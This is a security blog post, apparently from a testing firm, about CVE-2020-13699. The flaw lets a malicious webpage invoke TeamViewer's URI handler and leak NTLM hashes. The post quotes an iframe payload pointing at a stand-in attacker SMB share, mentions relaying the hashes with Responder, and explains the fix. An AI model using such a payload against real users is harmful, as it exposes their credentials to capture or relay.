TeamViewer Gmbh have released a patch for their Windows Desktop client to fix a credential leaking vulnerability which could allow a malicious webpage to obtain the hashed NTLM credentials of the active Windows user account.
A simple flaw (CVE-2020-13699) in the way the TeamViewer desktop client handles custom URI handlers means a malicious webpage can use an iframe to invoke the local TeamViewer application on the PC. Windows will then automatically attempt NTLM authentication for the target SMB share – providing the attacker with a copy of the hashed credentials which could then be attacked to obtain the clear password or simply relayed to authenticate against another target.
The security advisory states that the vulnerability affects TeamViewer versions 8 through 15.8.2 for the Windows platform. Users are advised to upgrade to version 15.8.3 to resolve the vulnerability.
The software defect is succinctly described by the researcher who discovered it:
An attacker could embed a malicious iframe in a website with a crafted URL (<iframe src=’teamviewer10: –play \\attacker-IP\share\fake.tvs’>) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).
This issue was remediated by quoting the parameters passed by the aforementioned URI handlers e.g. URL:teamviewer10 Protocol “C:\Program Files (x86)\TeamViewer\TeamViewer.exe” “%1”
This is a useful example of the impact of a trivial coding error which has a significant security implication. Security Managers can engage with Software Development Managers to implement secure coding practices which can be enforced through source code analysis and peer review systems to help eliminate this type of error.
“We were very impressed with the service, I will say, the vulnerability found was one our previous organisation had not picked up, which does make you wonder if anything else was missed.”
Aim Ltd Chief Technology Officer (CTO)